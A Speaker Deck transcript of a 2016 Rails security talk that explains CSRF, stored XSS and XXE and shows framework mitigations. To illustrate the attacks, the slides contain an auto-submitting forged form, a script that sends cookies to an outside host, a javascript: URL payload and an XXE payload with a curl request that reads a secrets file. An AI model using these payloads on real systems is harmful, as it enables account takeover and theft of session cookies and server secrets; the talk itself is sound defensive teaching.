Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security is Broken: Understanding Common Vulnerabilties

C44e1f7e22c3f23cff7bc130871047ef?s=47 Eileen M. Uchitelle
July 08, 2016
Technology
2
790

Security is Broken: Understanding Common Vulnerabilties

Brighton Ruby 2016

C44e1f7e22c3f23cff7bc130871047ef?s=128

Eileen M. Uchitelle

July 08, 2016
Tweet

More Decks by Eileen M. Uchitelle

See All by Eileen M. Uchitelle
Improving CVAR Performance in Ruby 3.1
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
0
420
Upgrading GitHub from Ruby 2.6 to 2.7
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
0
1.6k
Technically, a talk | Ruby Day 2020
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
1
57
Technically, a talk | Brighton Ruby 2020
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
0
24
Technically, a talk | RailsConf 2020
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
0
24
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
119
28k
Ruby on Ice 2019: The Past, Present and Future of Rails at GitHub
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
5
1.2k
Paris Ruby Conference 2018: The Future of Rails 6
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
12
3k
WeAreDevelopers 2018: The Unbearable Vulnerability of Open Source
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
5
490

Other Decks in Technology

See All in Technology
Devに力を授けたいSREのあゆみ / SRE that wants to empower developers
E12b5afe5b4e6552019c09d6ac4128c3?s=48 tocyuki
3
450
動画配信技術について
Cb4d62dd7c1d325863696c45e9b6484d?s=48 yaminoma
0
200
Power BI Premiumでデータ準備!
0cc2ebc5781bcb2cae5f9ab7efa40ff2?s=48 hanaseleb
1
180
msal.jsのあれこれ
716a39e2ee383722f960c17467eaf55b?s=48 takas0522
0
1.4k
Salesforce女子部-権限についてまとめてみたその1
F95794a2051e510588225c20afb7e3b2?s=48 sfggjp
0
180
Babylon.js v5 新機能の紹介
Eeac2f3b51b69b3cd6fb14ed348f0c6e?s=48 limes2018
0
980
成長を続ける組織でのSRE戦略:プレモーテムによる信頼性の認識共有 SRE Next 2022
Dccc861c47a9a7bfc7f71a86e1245897?s=48 niwatakeru
7
2.3k
如何使用 Argo Event& Workflow 快速建置自定義的工作流程 @ #CNTUG #47
2102a6b8760bd6f57f672805723dd83a?s=48 line_developers_tw
PRO
0
1.7k
モダンデータスタックとかの話(データエンジニアのお仕事とは)
95be3c1812a3ae53c2d81cc7ea2eeb3d?s=48 foursue
0
230
1,000万人以上が利用する「家族アルバム みてね」のSRE組織は4年間でどのように作られてきたのか/SRE NEXT 2022
46839cf590a549efe13547c17a6b2fde?s=48 isaoshimizu
4
2.6k
New Features in C# 10/11
1c3658db58f755e44fc1a70255c08ff7?s=48 chack411
0
690
技術広報の役割を定義してみた 2022年春
E2b467a18ec383cfa0068207e43df7fa?s=48 afroscript
3
2.4k

Featured

See All Featured
A Philosophy of Restraint
C9b18d9dff88a9dd2393364c2b3b21bd?s=48 colly
192
14k
How to name files
0a4f62e90c976eeb44d33add75cca5af?s=48 jennybc
39
58k
The Pragmatic Product Professional
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
19
2.9k
It's Worth the Effort
Ba530e786553390f3fb271848485681c?s=48 3n
172
25k
Intergalactic Javascript Robots from Outer Space
6804f1775cb4babfcc3851298566fbce?s=48 tanoku
261
25k
GraphQLとの向き合い方2022年版
893f54413c2bd9ba41d11d753aacaf2c?s=48 quramy
16
8.1k
YesSQL, Process and Tooling at Scale
D09fad3e36ae6841f54820be0e907f7a?s=48 rocio
157
12k
Thoughts on Productivity
A16eb159db895e3b01d3dc95767ad595?s=48 jonyablonski
43
2.2k
Visualization
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
124
11k
In The Pink: A Labor of Love
E837d2996f52008ace055a08fbfff992?s=48 frogandcode
130
21k
Embracing the Ebb and Flow
C9b18d9dff88a9dd2393364c2b3b21bd?s=48 colly
73
3.3k
Mobile First: as difficult as doing things right
0fe2973fa8d27d96547e43322341183a?s=48 swwweet
212
7.5k

Transcript

  1. SECURITY IS BROKEN Understanding Common Vulnerabilities

  2. None

  3. EILEEN M. UCHITELLE Security, Infrastructure & Performance Team at Basecamp

    ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes

  4. OPEN SOURCE Rails Committers Rails Security

  5. None
  6. None

  7. How is security broken?

  8. • Impossible to test for all possible vulnerabilities How is

    security broken?

  9. • Impossible to test for all possible vulnerabilities • Hackers

    are always one step ahead How is security broken?

  10. • Impossible to test for all possible vulnerabilities • Hackers

    are always one step ahead • Patching one vulnerability can lead to exposing new ones How is security broken?

  11. How did we get here?

  12. • Failed to enforce web standards How did we get

    here?

  13. vs.

  14. None

  15. • Failed to enforce web standards • Failed to implement

    a definition of security How did we get here?

  16. “...completely failed to come up with even the most rudimentary

    usable frameworks for understanding the security of modern software.” – Michal Zalewski, The Tangled Web

  17. • Failed to enforce web standards • Failed to implement

    a definition of security • Too few people understand the vulnerabilities How did we get here?
  18. None

  19. CSRF

  20. CSRF Cross-Site Request Forgery

  21. EXPLOITING CSRF

  22. JESSIE The Hacker ARYA The User

  23. None
  24. None

  25. <form class="edit_user" action="/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Arya" name="user[name]"

    /> <label for="user_email">Email</label> <input type="text" value=“arya@aryadog.com” name="user[email]" /> <label for="user_website">Website</label> <input type="text" value=“aryadog.com“ name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form>
  26. None

  27. Looks the same, different URL

  28. <body onload=“document.forms[0].submit()"> <form action="http://dogbook/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Arya"

    name=“user[name]" /> <label for="user_email">Email</label> <input type="text" value=“jessie@hacker.com" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value=“aryadog.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body>

  29. <form action="/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Arya" name=“user[name]" />

    <label for="user_email">Email</label> <input type="text" value=“jessie@hacker.com” name="user[email]" /> <label for="user_website">Website</label> <input type="text" value=“aryadog.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> Jessie’s email

  30. <body onload=“document.forms[0].submit()"> <form action="http://dogbook.com/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Arya"

    name="user[name]" /> <label for="user_email">Email</label> <input type="text" value=“arya@aryadog.com” name="user[email]" /> <label for="user_website">Website</label> <input type="text" value=“aryadog.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body> Auto-submit form

  31. <body onload=“document.forms[0].submit()"> <form action=“http://dogbook.com/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Arya"

    name="user[name]" /> <label for="user_email">Email</label> <input type="text" value=“arya@aryadog.com” name="user[email]" /> <label for="user_website">Website</label> <input type="text" value=“aryadog.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body> Auto-submit form to victim site

  32. Jessie’s email

  33. How dangerous are CSRF attacks?

  34. How can we protect
 our users from
 CSRF attacks?

  35. • Use built-in framework CSRF protection How to mitigate CSRF?

  36. None

  37. class ApplicationController < ActionController::Base protect_from_forgery with: :exception end

  38. <form action="/users/2" method="post"> <input type="hidden" value="31RRdFdpulXYDxsOjyTRqKPiJxcP3+ayC==" name=authenticity_token" /> <label for="user_name">Name</label>

    <input type="text" value="Eileen" name="user[name]" /> <label for="user_email">Email</label> <input type="text" value="changed@example.com" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> CSRF protection

  39. Caveat: CSRF protection in Rails is order-dependent

  40. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end

  41. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end Conditional authentication

  42. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end class ChatsController < ApplicationController skip_before_action :authenticate before_action :authenticate_for_chat, only: :create end

  43. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end class ChatsController < ApplicationController skip_before_action :authenticate before_action :authenticate_for_chat, only: :create end Skip auth callback

  44. >> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :verify_authenticity_token, :authenticate_for_chat ] Authentication callback is

    too late in the chain

  45. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end class ChatsController < ActionController::Base skip_before_action :authenticate before_action :authenticate_for_chat, only: :create protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end

  46. >> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :authenticate_for_chat, :verify_authenticity_token ] Corrected callback order

  47. None

  48. • Use built-in framework CSRF protection • Refresh tokens with

    the session / don’t reuse tokens How to mitigate CSRF?

  49. class SessionsController < ApplicationController def destroy sign_out reset_session redirect_to sign_in_url

    end end Refreshes Authenticity Token

  50. • Use built-in framework CSRF protection • Refresh tokens with

    the session / don’t reuse tokens • Mitigate XSS attacks How to mitigate CSRF?

  51. XSS

  52. XSS Cross-Site Scripting

  53. EXPLOITING STORED XSS

  54. None

  55. <script> document.write( '<img src=“http://www.hax0rcats.com/' + document.cookie + '">' ); </script>

    automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To
  56. None

  57. Escaped HTML

  58. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= @user.name %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

  59. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= (@user.name).html_safe %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To
  60. None

  61. JavaScript Scheme

  62. None

  63. javascript://example.com/%0Aalert(1)

  64. example.com/%0Aalert(1) JavaScript Scheme javascript://

  65. javascript://example.com/%0Aalert(1) URL example.com

  66. Percent encoded “line feed” javascript://example.com/%0Aalert(1) %0A

  67. JavaScript Alert javascript://example.com/%0Aalert(1) alert(1)

  68. How dangerous are XSS attacks?

  69. How can we protect
 our users from
 XSS attacks?

  70. • Always escape user-provided data How to mitigate XSS?

  71. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= (@user.name).html_safe %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Don’t do this
  72. None

  73. • Don’t HTML escape user-provided data • Sanitize user-provided data

    How to mitigate XSS?

  74. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= sanitize(@user.name) %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Will strip out unwanted tags and attributes

  75. • Don’t HTML escape user-provided data • Sanitize user-provided data

    • Validate user-provided data How to mitigate XSS?

  76. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  77. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  78. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  79. XXE

  80. XXE XML eXternal Entity Attack

  81. <!-- todolist.xml --> <!DOCTYPE todolist [ <!ENTITY ext1 SYSTEM “list_items_6-7.xml”>

    ]> <list> <todo>Take a nap</todo> <todo>Go on a long walk with my hooman</todo> &ext1; <todo>Take another nap</todo> <todo>Go to bed</todo> </list>

  82. <!-- todolist.xml --> <!DOCTYPE todolist [ <!ENTITY ext1 SYSTEM “list_items_3-4.xml”>

    ]> <list> <todo>Take a nap</todo> <todo>Go on a long walk with my hooman</todo> &ext1; <todo>Take another nap</todo> <todo>Go to bed</todo> </list> Entity reference

  83. <!-- list_items_3-4.xml --> <todo>Eat breakfast</todo> <todo>Bark at the mail carrier</todo>

  84. <!-- after parsing --> <list> <todo>Take a nap</todo> <todo>Go on

    a long walk with my hooman</todo> <todo>Eat breakfast</todo> <todo>Bark at the mail carrier</todo> <todo>Take another nap</todo> <todo>Go to bed</todo> </list>

  85. EXPLOITING XXE

  86. class UsersController < ApplicationController def create @user = User.new(user_params) respond_to

    do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end

  87. class UsersController < ApplicationController def create @user = User.new(user_params) respond_to

    do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end XML

  88. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user>

  89. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user> Requested file

  90. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user> Entity reference

  91. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml POST

    request to users create

  92. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml Payload

  93. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml <user>

    <name> ... production: secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5 f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40 00e166a9a5 ... </name> </user> secrets.yml as user’s name
  94. None

  95. How dangerous are XXE attacks?

  96. None

  97. How can we protect
 our servers from
 XXE attacks?

  98. • Don’t parse XML How to mitigate XXE?

  99. Don’t parse XML

  100. • Don’t parse XML • Don’t use parsers that allow

    entity replacement (LibXML) How to mitigate XXE?

  101. >> LibXML::XML.default_substitute_entities >> true

  102. • Don’t parse XML • Don’t use parsers that allow

    entity replacement (LibXML) • Whitelist known entities How to mitigate XXE?

  103. Investigate vulnerabilities & patches SECURITY

  104. GitHub
 eileencodes/security_examples

  105. owasp.org

  106. None

  107. Brakeman

  108. Resilience & empowerment SECURITY

  109. None

  110. Awareness of vulnerabilities SECURITY

  111. JESSIE The Hacker ARYA The User

  112. None

  113. To the future

  114. EILEEN M. UCHITELLE Security, Infrastructure & Performance Team at Basecamp

    ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes